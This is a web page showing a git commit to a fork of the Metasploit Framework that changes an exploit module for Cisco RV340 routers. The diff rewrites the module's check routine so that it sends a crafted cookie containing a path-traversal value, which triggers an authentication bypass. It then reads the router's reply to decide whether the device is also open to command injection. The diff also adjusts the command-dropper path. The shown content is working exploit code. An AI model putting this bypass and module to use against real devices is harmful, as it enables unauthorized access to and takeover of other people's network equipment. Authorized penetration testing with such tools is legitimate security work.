dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Rewrote check method to only abuse authentication bypass. Added additional status checks.

This commit is contained in:
Stephen Wildow 2023-02-11 17:43:33 -05:00
parent 036ed7f467
commit 79b1801a4f
No known key found for this signature in database
GPG Key ID: 3D8ACAD402C22B27
1 changed files with 27 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
modules/exploits/linux/http/cisco_rv340_lan.rb
View File

@ -88,22 +88,35 @@ class MetasploitModule < Msf::Exploit::Remote
) )
end end
def check # sessionid utilized later needs to be set to length
# Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce # of 16 or exploit will fail. Tested with lengths
# Test to see if router is responding and possibly vulnerable # 14-17
res = send_exploit('id') def generate_session_id
return Rex::Text.rand_text_alphanumeric(16)
return CheckCode::Unknown("Didn't receive a response from the target.") if res.nil?
# Versions 1.0.03.26 and above will respond with 403 Forbidden during exploitation
return CheckCode::Safe('The target responded with 403 Forbidden and is not vulnerable.') if res.code == 403
# Vulnerable versions will respond with 301 Moved Permanently in body of response
if res.body.include?('<head><title>301 Moved Permanently</title></head>')
return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
end end
CheckCode::Safe('The target did not respond with an expected payload.') def check
res = send_request_cgi({
'method' => 'GET',
'uri' => '/upload',
'headers' => {
'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id
}
}, 10)
# A proper "upload" will trigger file creation. So created above is an incorrect "upload" call to avoid file
# creation. The router return a status code 405 Not Allowed if authentication has been bypassed by above request.
# The firmware containing this authentication bypass also contains the command injection vulnerability that will be
# abused during actual exploitation. Non-vulnerable firmware versions will respond with 403 Forbidden.
if res.nil?
return CheckCode::Unknown('The device did not respond to request packet.')
elsif !res.nil? && res.code == 405
return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
elsif res.code == 403
return CheckCode::Safe('The device is not vulnerable to exploitation.')
else # Catch-all
return CheckCode::Unknown('The target responded in such a way that exploitation in unknown and unlikely.')
end
end end
def execute_command(cmd, _opts = {}) def execute_command(cmd, _opts = {})
@ -116,6 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
end end
if target['Type'] == :linux_dropper if target['Type'] == :linux_dropper
fail_with(Failure::Unreachable, 'The target did not respond') unless res
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200 fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
begin begin
body_json = res.get_json_document body_json = res.get_json_document